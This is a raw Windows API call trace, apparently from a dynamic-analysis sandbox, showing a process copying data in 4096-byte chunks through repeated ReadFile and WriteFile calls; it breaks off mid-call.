[0077.877] GetLastError () returned 0x0 [0077.877] SetLastError (dwErrCode=0x0) [0077.877] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.877] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.879] GetLastError () returned 0x0 [0077.879] SetLastError (dwErrCode=0x0) [0077.879] GetLastError () returned 0x0 [0077.879] SetLastError (dwErrCode=0x0) [0077.879] GetLastError () returned 0x0 [0077.879] SetLastError (dwErrCode=0x0) [0077.879] GetLastError () returned 0x0 [0077.879] SetLastError (dwErrCode=0x0) [0077.879] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.879] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.879] GetLastError () returned 0x0 [0077.879] SetLastError (dwErrCode=0x0) [0077.880] GetLastError () returned 0x0 [0077.880] SetLastError (dwErrCode=0x0) [0077.880] GetLastError () returned 0x0 [0077.880] SetLastError (dwErrCode=0x0) [0077.880] GetLastError () returned 0x0 [0077.880] SetLastError (dwErrCode=0x0) [0077.880] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.880] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.880] GetLastError () returned 0x0 [0077.880] SetLastError (dwErrCode=0x0) [0077.880] GetLastError () returned 0x0 [0077.880] SetLastError (dwErrCode=0x0) [0077.881] GetLastError () returned 0x0 [0077.881] SetLastError (dwErrCode=0x0) [0077.881] GetLastError () returned 0x0 [0077.881] SetLastError (dwErrCode=0x0) [0077.881] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.881] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.881] GetLastError () returned 0x0 [0077.881] SetLastError (dwErrCode=0x0) [0077.881] GetLastError () returned 0x0 [0077.881] SetLastError (dwErrCode=0x0) [0077.881] GetLastError () returned 0x0 [0077.881] SetLastError (dwErrCode=0x0) [0077.882] GetLastError () returned 0x0 [0077.882] SetLastError (dwErrCode=0x0) [0077.882] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.882] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.882] GetLastError () returned 0x0 [0077.882] SetLastError (dwErrCode=0x0) [0077.882] GetLastError () returned 0x0 [0077.882] SetLastError (dwErrCode=0x0) [0077.882] GetLastError () returned 0x0 [0077.882] SetLastError (dwErrCode=0x0) [0077.883] GetLastError () returned 0x0 [0077.883] SetLastError (dwErrCode=0x0) [0077.883] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.883] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.883] GetLastError () returned 0x0 [0077.883] SetLastError (dwErrCode=0x0) [0077.883] GetLastError () returned 0x0 [0077.883] SetLastError (dwErrCode=0x0) [0077.883] GetLastError () returned 0x0 [0077.883] SetLastError (dwErrCode=0x0) [0077.884] GetLastError () returned 0x0 [0077.884] SetLastError (dwErrCode=0x0) [0077.884] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.884] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.884] GetLastError () returned 0x0 [0077.884] SetLastError (dwErrCode=0x0) [0077.884] GetLastError () returned 0x0 [0077.884] SetLastError (dwErrCode=0x0) [0077.884] GetLastError () returned 0x0 [0077.884] SetLastError (dwErrCode=0x0) [0077.885] GetLastError () returned 0x0 [0077.885] SetLastError (dwErrCode=0x0) [0077.885] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.885] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.885] GetLastError () returned 0x0 [0077.885] SetLastError (dwErrCode=0x0) [0077.885] GetLastError () returned 0x0 [0077.885] SetLastError (dwErrCode=0x0) [0077.885] GetLastError () returned 0x0 [0077.885] SetLastError (dwErrCode=0x0) [0077.885] GetLastError () returned 0x0 [0077.885] SetLastError (dwErrCode=0x0) [0077.886] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.886] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.886] GetLastError () returned 0x0 [0077.886] SetLastError (dwErrCode=0x0) [0077.886] GetLastError () returned 0x0 [0077.886] SetLastError (dwErrCode=0x0) [0077.886] GetLastError () returned 0x0 [0077.886] SetLastError (dwErrCode=0x0) [0077.886] GetLastError () returned 0x0 [0077.886] SetLastError (dwErrCode=0x0) [0077.886] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.887] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.887] GetLastError () returned 0x0 [0077.887] SetLastError (dwErrCode=0x0) [0077.887] GetLastError () returned 0x0 [0077.887] SetLastError (dwErrCode=0x0) [0077.887] GetLastError () returned 0x0 [0077.887] SetLastError (dwErrCode=0x0) [0077.887] GetLastError () returned 0x0 [0077.887] SetLastError (dwErrCode=0x0) [0077.887] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.887] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.888] GetLastError () returned 0x0 [0077.888] SetLastError (dwErrCode=0x0) [0077.888] GetLastError () returned 0x0 [0077.888] SetLastError (dwErrCode=0x0) [0077.888] GetLastError () returned 0x0 [0077.888] SetLastError (dwErrCode=0x0) [0077.888] GetLastError () returned 0x0 [0077.888] SetLastError (dwErrCode=0x0) [0077.888] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.888] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.888] GetLastError () returned 0x0 [0077.888] SetLastError (dwErrCode=0x0) [0077.889] GetLastError () returned 0x0 [0077.889] SetLastError (dwErrCode=0x0) [0077.889] GetLastError () returned 0x0 [0077.889] SetLastError (dwErrCode=0x0) [0077.889] GetLastError () returned 0x0 [0077.889] SetLastError (dwErrCode=0x0) [0077.889] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.889] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.889] GetLastError () returned 0x0 [0077.889] SetLastError (dwErrCode=0x0) [0077.889] GetLastError () returned 0x0 [0077.889] SetLastError (dwErrCode=0x0) [0077.889] GetLastError () returned 0x0 [0077.890] SetLastError (dwErrCode=0x0) [0077.890] GetLastError () returned 0x0 [0077.890] SetLastError (dwErrCode=0x0) [0077.890] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.166] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.166] GetLastError () returned 0x0 [0078.167] SetLastError (dwErrCode=0x0) [0078.167] GetLastError () returned 0x0 [0078.167] SetLastError (dwErrCode=0x0) [0078.167] GetLastError () returned 0x0 [0078.167] SetLastError (dwErrCode=0x0) [0078.167] GetLastError () returned 0x0 [0078.167] SetLastError (dwErrCode=0x0) [0078.167] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.167] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.167] GetLastError () returned 0x0 [0078.167] SetLastError (dwErrCode=0x0) [0078.167] GetLastError () returned 0x0 [0078.168] SetLastError (dwErrCode=0x0) [0078.168] GetLastError () returned 0x0 [0078.168] SetLastError (dwErrCode=0x0) [0078.168] GetLastError () returned 0x0 [0078.168] SetLastError (dwErrCode=0x0) [0078.168] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.168] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.168] GetLastError () returned 0x0 [0078.168] SetLastError (dwErrCode=0x0) [0078.168] GetLastError () returned 0x0 [0078.168] SetLastError (dwErrCode=0x0) [0078.168] GetLastError () returned 0x0 [0078.168] SetLastError (dwErrCode=0x0) [0078.169] GetLastError () returned 0x0 [0078.169] SetLastError (dwErrCode=0x0) [0078.169] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.169] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.169] GetLastError () returned 0x0 [0078.169] SetLastError (dwErrCode=0x0) [0078.169] GetLastError () returned 0x0 [0078.169] SetLastError (dwErrCode=0x0) [0078.169] GetLastError () returned 0x0 [0078.169] SetLastError (dwErrCode=0x0) [0078.169] GetLastError () returned 0x0 [0078.170] SetLastError (dwErrCode=0x0) [0078.170] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.170] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.170] GetLastError () returned 0x0 [0078.170] SetLastError (dwErrCode=0x0) [0078.170] GetLastError () returned 0x0 [0078.170] SetLastError (dwErrCode=0x0) [0078.170] GetLastError () returned 0x0 [0078.170] SetLastError (dwErrCode=0x0) [0078.170] GetLastError () returned 0x0 [0078.170] SetLastError (dwErrCode=0x0) [0078.170] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.171] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.171] GetLastError () returned 0x0 [0078.171] SetLastError (dwErrCode=0x0) [0078.171] GetLastError () returned 0x0 [0078.171] SetLastError (dwErrCode=0x0) [0078.171] GetLastError () returned 0x0 [0078.171] SetLastError (dwErrCode=0x0) [0078.171] GetLastError () returned 0x0 [0078.171] SetLastError (dwErrCode=0x0) [0078.171] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.171] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.172] GetLastError () returned 0x0 [0078.172] SetLastError (dwErrCode=0x0) [0078.172] GetLastError () returned 0x0 [0078.172] SetLastError (dwErrCode=0x0) [0078.172] GetLastError () returned 0x0 [0078.172] SetLastError (dwErrCode=0x0) [0078.172] GetLastError () returned 0x0 [0078.172] SetLastError (dwErrCode=0x0) [0078.172] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.172] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.173] GetLastError () returned 0x0 [0078.173] SetLastError (dwErrCode=0x0) [0078.173] GetLastError () returned 0x0 [0078.173] SetLastError (dwErrCode=0x0) [0078.173] GetLastError () returned 0x0 [0078.173] SetLastError (dwErrCode=0x0) [0078.173] GetLastError () returned 0x0 [0078.173] SetLastError (dwErrCode=0x0) [0078.173] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.173] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.173] GetLastError () returned 0x0 [0078.173] SetLastError (dwErrCode=0x0) [0078.173] GetLastError () returned 0x0 [0078.174] SetLastError (dwErrCode=0x0) [0078.174] GetLastError () returned 0x0 [0078.174] SetLastError (dwErrCode=0x0) [0078.174] GetLastError () returned 0x0 [0078.174] SetLastError (dwErrCode=0x0) [0078.174] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.174] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.174] GetLastError () returned 0x0 [0078.174] SetLastError (dwErrCode=0x0) [0078.174] GetLastError () returned 0x0 [0078.174] SetLastError (dwErrCode=0x0) [0078.174] GetLastError () returned 0x0 [0078.174] SetLastError (dwErrCode=0x0) [0078.175] GetLastError () returned 0x0 [0078.175] SetLastError (dwErrCode=0x0) [0078.175] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.175] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.175] GetLastError () returned 0x0 [0078.175] SetLastError (dwErrCode=0x0) [0078.175] GetLastError () returned 0x0 [0078.175] SetLastError (dwErrCode=0x0) [0078.175] GetLastError () returned 0x0 [0078.175] SetLastError (dwErrCode=0x0) [0078.175] GetLastError () returned 0x0 [0078.175] SetLastError (dwErrCode=0x0) [0078.175] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.175] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.176] GetLastError () returned 0x0 [0078.176] SetLastError (dwErrCode=0x0) [0078.176] GetLastError () returned 0x0 [0078.176] SetLastError (dwErrCode=0x0) [0078.176] GetLastError () returned 0x0 [0078.176] SetLastError (dwErrCode=0x0) [0078.176] GetLastError () returned 0x0 [0078.176] SetLastError (dwErrCode=0x0) [0078.176] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.176] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.176] GetLastError () returned 0x0 [0078.176] SetLastError (dwErrCode=0x0) [0078.176] GetLastError () returned 0x0 [0078.176] SetLastError (dwErrCode=0x0) [0078.176] GetLastError () returned 0x0 [0078.176] SetLastError (dwErrCode=0x0) [0078.176] GetLastError () returned 0x0 [0078.176] SetLastError (dwErrCode=0x0) [0078.176] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.177] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.177] GetLastError () returned 0x0 [0078.177] SetLastError (dwErrCode=0x0) [0078.177] GetLastError () returned 0x0 [0078.177] SetLastError (dwErrCode=0x0) [0078.177] GetLastError () returned 0x0 [0078.177] SetLastError (dwErrCode=0x0) [0078.177] GetLastError () returned 0x0 [0078.177] SetLastError (dwErrCode=0x0) [0078.177] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.177] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.177] GetLastError () returned 0x0 [0078.177] SetLastError (dwErrCode=0x0) [0078.177] GetLastError () returned 0x0 [0078.177] SetLastError (dwErrCode=0x0) [0078.177] GetLastError () returned 0x0 [0078.177] SetLastError (dwErrCode=0x0) [0078.177] GetLastError () returned 0x0 [0078.177] SetLastError (dwErrCode=0x0) [0078.177] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.178] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.178] GetLastError () returned 0x0 [0078.178] SetLastError (dwErrCode=0x0) [0078.178] GetLastError () returned 0x0 [0078.178] SetLastError (dwErrCode=0x0) [0078.178] GetLastError () returned 0x0 [0078.178] SetLastError (dwErrCode=0x0) [0078.178] GetLastError () returned 0x0 [0078.178] SetLastError (dwErrCode=0x0) [0078.178] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.178] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.178] GetLastError () returned 0x0 [0078.178] SetLastError (dwErrCode=0x0) [0078.178] GetLastError () returned 0x0 [0078.178] SetLastError (dwErrCode=0x0) [0078.178] GetLastError () returned 0x0 [0078.178] SetLastError (dwErrCode=0x0) [0078.178] GetLastError () returned 0x0 [0078.178] SetLastError (dwErrCode=0x0) [0078.178] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.179] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.179] GetLastError () returned 0x0 [0078.179] SetLastError (dwErrCode=0x0) [0078.179] GetLastError () returned 0x0 [0078.179] SetLastError (dwErrCode=0x0) [0078.179] GetLastError () returned 0x0 [0078.179] SetLastError (dwErrCode=0x0) [0078.179] GetLastError () returned 0x0 [0078.179] SetLastError (dwErrCode=0x0) [0078.179] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.179] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.179] GetLastError () returned 0x0 [0078.179] SetLastError (dwErrCode=0x0) [0078.179] GetLastError () returned 0x0 [0078.179] SetLastError (dwErrCode=0x0) [0078.179] GetLastError () returned 0x0 [0078.179] SetLastError (dwErrCode=0x0) [0078.179] GetLastError () returned 0x0 [0078.179] SetLastError (dwErrCode=0x0) [0078.180] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, 